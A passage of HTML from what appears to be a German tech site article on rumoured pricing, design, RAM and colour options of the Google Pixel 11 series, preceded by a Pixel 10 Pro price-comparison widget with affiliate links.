						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.085,91 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/8832469004" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/8832469004" data-vendor-api="shopping24" data-vars-product-price="1.085,91 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 1.085,91 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.085,91 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aDi6WCFLcQggFdiMIpCMzOwK0-RvIEuSuStW0SFkIqZMdozeyQB1s3_NYWZJZdx_FUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RPycuBwsu44UCTvm99U9FVv&amp;mid=685497142624&amp;id=685497142624&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aDi6WCFLcQggFdiMIpCMzOwK0-RvIEuSuStW0SFkIqZMdozeyQB1s3_NYWZJZdx_FUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RPycuBwsu44UCTvm99U9FVv&amp;mid=685497142624&amp;id=685497142624&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.085,91 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.085,91 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Google</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.099,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/product/pixel_10_pro" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/product/pixel_10_pro" data-vars-product-price="1.099,00 €" data-vars-product-vendor="Google" aria-label="Deal anschauen bei Google für 1.099,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.116,08 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=LclCJaTpyFBgvrhhe5GGHeKFFgDnWCVLKnqn0bkX8TYD2eBKnwuxU1ONt2jyH31IlUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RNlddbQJq87NQ&amp;mid=686468941685&amp;id=686468941685&amp;ts=20260708&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro" data-vars-product-id="2885443" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885443" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=LclCJaTpyFBgvrhhe5GGHeKFFgDnWCVLKnqn0bkX8TYD2eBKnwuxU1ONt2jyH31IlUCt42IORS2NdyiYhKsSh4pVXnFPgu6pTKm2AV43KDScDIN4u2A5RNlddbQJq87NQ&amp;mid=686468941685&amp;id=686468941685&amp;ts=20260708&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.116,08 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.116,08 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading toc">Wie viel wird das Google Pixel 11 kosten?</h2>



<p>Die Preise für das Pixel 11 sind noch nicht bestätigt, doch sollte Google seinen jüngsten Preistrends folgen, könnte der Einstiegspreis für das Basismodell bei etwa 899 Euro liegen, während die Pro-Version möglicherweise etwa 1.099 Euro kosten würde. Die Pro XL- und Pro Fold-Versionen könnten etwa 1.299 Euro beziehungsweise 1.899 Euro kosten.</p>



<p>Diese Preisgestaltung würde jedoch bedeuten, dass Google an die Preise der Pixel-10-Modelle anknüpft, bei denen es im Vergleich zur Pixel-9-Serie keine Preiserhöhung gab. Es ist unwahrscheinlich, dass dies zwei Jahre in Folge geschieht; daher rechnen wir eher mit einer Preiserhöhung für die Pixel-11-Smartphones, auch wenn diese nur geringfügig ausfällt.</p>



<p>Ein Hinweis, der möglicherweise auf Googles Strategie hindeutet, Preiserhöhungen zu vermeiden, ist die Reduzierung der RAM-Kapazität bei den neuen Smartphones. Es scheint, als werde Google das 11 Pro und das 11 Pro XL in zwei Varianten mit entweder 12 oder 16 GB RAM anbieten.</p>



<p>Das 12-GB-Modell könnte die Lösung sein, mit der Google einen höheren Einstiegspreis für seine Flaggschiff-Smartphones vermeiden könnte – auch wenn dies bedeutet, dass Sie für denselben Preis nicht so viel Leistung erhalten wie bei den aktuellen Modellen <a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro</a> und <a href="https://www.pcwelt.de/article/2896055/google-pixel-10-pro-xl-test-bestes-android-handy-2025.html" target="_blank" rel="noreferrer noopener">10 Pro XL</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b4b25"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-34.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 34" class="wp-image-2454254" width="1200" height="672" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<h2 class="wp-block-heading toc">Welche technischen Daten und Funktionen wird das Google Pixel 11 bieten?</h2>



<div class="wp-block-idg-base-theme-listicle-chart-block wp-block-product-chart product-chart">
<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Design &amp; Verarbeitung</h3>



<p>Angesichts der Tatsache, dass Google bisher sehr zurückhaltend war, das Design seiner Smartphones grundlegend zu überarbeiten – abgesehen davon, dass die Kameraleiste ab dem <a href="https://www.pcwelt.de/article/2434705/google-pixel-9-test.html" target="_blank" rel="noreferrer noopener">Pixel 9</a> zu einem Visier umgestaltet wurde –, erwarten wir hier keine gravierenden Änderungen. Die jüngsten Gerüchte haben dies weitgehend bestätigt, doch es gibt einige kleinere Designanpassungen, die die neuen Pixel-Smartphones nicht nur schlanker wirken lassen, sondern auch ihre allgemeine Benutzerfreundlichkeit verbessern sollen.</p>



<p>Da Google zuvor erklärt hat, dass wir alle zwei bis drei Jahre mit einem Redesign rechnen können, scheint es, als werde die Pixel-12-Serie im Jahr 2027 größere Veränderungen mit sich bringen.</p>



<p>Was das Design des Pixel 11 betrifft<a href="https://www.techadvisor.com/article/3102252/google-pixel-11-design-leak-highlights-two-changes.html">,</a> so scheint es – <a href="https://www.androidheadlines.com/google-pixel-11-pro-fold" target="_blank" rel="noreferrer noopener">wie aus CAD-basierten Renderings hervorgeht</a> – dem Pixel 10 äußerst ähnlich zu sein, mit lediglich zwei Designanpassungen. Dabei handelt es sich um einen schmaleren Rahmen um den Bildschirm sowie eine vollständig aus Glas bestehende Kameraleiste anstelle eines Metallabschnitts um den Blitz herum.</p>



<p>Die Abmessungen sind angeblich identisch, abgesehen davon, dass das Smartphone 0,1 Millimeter dünner ist. Bitte beachten Sie, dass die Farbe nur zur Veranschaulichung dient, da sie lediglich auf der Farbe „Lavender“ des <a href="https://www.pcwelt.de/article/3104634/google-pixel-10a-test.html" target="_blank" rel="noreferrer noopener">Pixel 10a</a> basiert.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b532b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-11-design-leaked-front-and-back.webp?w=1200" alt="Google Pixel 11 design leaked front and back" class="wp-image-3102256" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Als Nächstes folgt das Pixel 11 Pro, bei dem sich ein ähnliches Bild wie beim Standardmodell abzeichnet. Die Renderings scheinen ein nahezu identisches Design mit dem gleichen glänzenden Rahmen wie zuvor zu bestätigen, ergänzt durch die neue, komplett schwarze Kameraleiste.</p>



<p>Besonders auffällig ist, dass der Temperatursensor auf der Rückseite zu fehlen scheint. Dieser befindet sich normalerweise unterhalb des Blitzes innerhalb der Kameraleiste und könnte auf den Wegfall dieser einzigartigen, wenn auch eher nischenorientierten Funktion hindeuten.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b5846"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-11-Pro-leak-front-and-back.webp" alt="Google Pixel 11 Pro leak front and back" class="wp-image-3103374" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Und hier ist das Renderbild des Pixel 11 Pro XL, das dasselbe zeigt:</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b5d1f"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Google-Pixel-11-Pro-XL-leaked-design.webp" alt="Google Pixel 11 Pro XL design" class="wp-image-3105903" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Onleaks / Android Headlines</p></div>



<p>Für das Pixel 11 Pro Fold sind online einige Renderings aufgetaucht, die eine sehr ähnliche Bauweise wie beim <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank" rel="noreferrer noopener">10 Pro Fold</a> zeigen – so sehr, dass man die beiden Modelle auf den ersten Blick verwechseln könnte. Bei genauerem Hinsehen fällt jedoch auf, dass der Blitz und das Mikrofon in die Kameraausbuchtung integriert wurden, um ein einheitliches Erscheinungsbild zu schaffen.</p>



<p>Zwar ist es unwahrscheinlich, dass diese Maßnahme allein zu einer Verbesserung der Kameraqualität des 11 Pro Fold führt, doch aus gestalterischer Sicht wirkt das Design dadurch deutlich aufgeräumter.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b623e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Pixel-11-pro-fold-render.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3083650" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">OnLeaks x Android Headlines</p></div>



<p>Interessanter sind die Renderings, die das 11 Pro Fold im Seitenprofil zeigen; sie deuten offenbar darauf hin, dass das Smartphone im aufgeklappten Zustand nur 4,8 Millimeter dünn und im zusammengeklappten Zustand 10,1 Millimeter dick sein wird.</p>



<p>Zugegebenermaßen liegt das Gerät damit noch einen Schritt hinter der Konkurrenz zurück (das <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 7</a> und das <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank" rel="noreferrer noopener">Honor Magic V5</a> sind im aufgeklappten Zustand nur 4,2 Millimeter beziehungsweise 4,1 Millimeter dünn), doch es stellt eine deutliche Verbesserung gegenüber dem 10 Pro Fold dar, das sich in der Hand etwas klobig anfühlte.</p>



<p>Wenden wir uns nun dem Pixel 11 Pro XL zu: Die ersten Vorstellungen davon, wie dieses Smartphone aussehen könnte, stammen nicht aus einer Reihe von Renderings, sondern vom Hüllenhersteller <a href="https://thinborne.com/products/pixel-11-pro-xl-case" target="_blank" rel="noreferrer noopener">Thinborne</a>, der (versehentlich?) die dazugehörige Handyhülle etwas früher als geplant vorgestellt hat.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b6785"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Pixel-11-Pro-case.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3083654" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">ThinBorne</p></div>



<p>Zwar lassen sich aus einer Hülle nur begrenzt Rückschlüsse ziehen, doch die Aussparung für die Kamera deutet darauf hin, dass es einen etwas größeren, aber massiveren Kameraausleger geben könnte. </p>



<p>Sollte dies zutreffen, dürfte dies verhindern, dass die Kameras in Ihrer Hosentasche hervorstehen – ein Problem, das im Jahr 2026 immer größer zu werden scheint (die Kamerawölbung <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">des Honor Magic 8 Pro</a> ist in einer Jeans schon aus einem Kilometer Entfernung zu erkennen). Ob dies auch eine Änderung der verbauten Sensoren beim Pixel 11 Pro XL bedeutet, bleibt abzuwarten.</p>



<p>Was die Farbvarianten angeht, hat die Android 17 QPR1 Beta möglicherweise ein Licht auf die Sache geworfen, da sie zwei Hintergrundbilder enthält, die angeblich mit dem Pixel 11 Pro Fold in Verbindung stehen und die <a href="https://9to5google.com/2026/04/23/pixel-11-pro-fold-wallpaper-leak/">Namen „Lunar Tides“ sowie „Tidal Swirl“ tragen</a>.</p>



<p>In der Vergangenheit waren die von Google mitgelieferten Hintergrundbilder in der Regel so gestaltet, dass sie zur Außenfarbe der jeweils neuesten Smartphones passten. Während „Lunar Tides“ einen monochromen Stil aufweist, der dem „Moonstone“-Farbdesign des 10 Pro Fold nicht allzu unähnlich ist, ist es „Tidal Swirl“, das einen dunkleren Grünton aufweist, als wir ihn von der aktuellen Generation der Pixel-Smartphones kennen.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b6cde"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Google-Pixel-11-Fold-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3126177" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">9to5Google</p></div>



<p>Bei genauerer Betrachtung der Beta-Version lässt sich feststellen, dass diese Hintergrundbilder mit Codenamen verknüpft sind, wobei „Midnight“ und „Pine“ jeweils mit „Lunar Tides“ und „Tidal Swirl“ gepaart sind. Obwohl sich zum jetzigen Zeitpunkt noch nicht genau sagen lässt, wie viele der Pixel-11-Geräte die potenziell ansprechende „Pine“-Variante erhalten könnten, sind diese Neuigkeiten ein gutes Zeichen für alle, die eine grüne Farbvariante auf ihrem Gerät bevorzugen.</p>



<p>Seitdem diese „Pro Fold“-Hintergrundbilder durchgesickert sind, <a href="https://t.me/mysticleaks/184" target="_blank" rel="noreferrer noopener">sind weitere aufgetaucht</a>, die darauf hindeuten, was die anderen Smartphones der Reihe erwarten könnte – und dies deutet auf eine Gesamtstrategie hin, mit der Google möglicherweise von einigen der eher bombastischen Farben der Vergangenheit abrücken möchte.</p>



<p>Für das Pixel 11 liegen uns vier Hintergrundbilder vor, die alle in gedeckteren Farbtönen gehalten sind und sich deutlich vom fast neonartigen „Lemongrass“ des Pixel 10 oder dem „Berry“ des <a href="https://www.pcwelt.de/article/3104634/google-pixel-10a-test.html" target="_blank" rel="noreferrer noopener">Pixel 10a </a>unterscheiden.</p>



<ul class="wp-block-list">
<li>Schwarz</li>



<li>Grün</li>



<li>Rot/Rosa</li>



<li>Lila/Grau</li>
</ul>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b727c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Pixel-11-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 11 wallpaper" class="wp-image-3156410" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mystic Leaks</p></div>



<p>Ähnlich verhält es sich mit dem 11 Pro und dem Pro XL, da diese dem gleichen Designkonzept folgen, jedoch eine leicht abweichende Farbpalette aufweisen. Sollten diese Hintergrundbilder – wie in den vergangenen Jahren – nahtlos mit den Farbvarianten der Hardware harmonieren, können wir für das Jahr 2026 eine noch raffiniertere Auswahl an Pixel-Smartphones erwarten.</p>



<ul class="wp-block-list">
<li>Beige/Braun</li>



<li>Blau/Silber</li>



<li>Grün</li>



<li>Schwarz</li>
</ul>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b77d1"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Pixel-11-Pro-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 11 Pro wallpaper" class="wp-image-3156412" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mystic Leaks</p></div>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-1 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF1"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-1 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Display</h3>



<p>Google wird bei der Pixel-11-Serie voraussichtlich weiterhin auf hochauflösende OLED-Displays setzen, wobei Verbesserungen bei Helligkeit, Farbgenauigkeit und Bildwiederholfrequenz zu erwarten sind.</p>



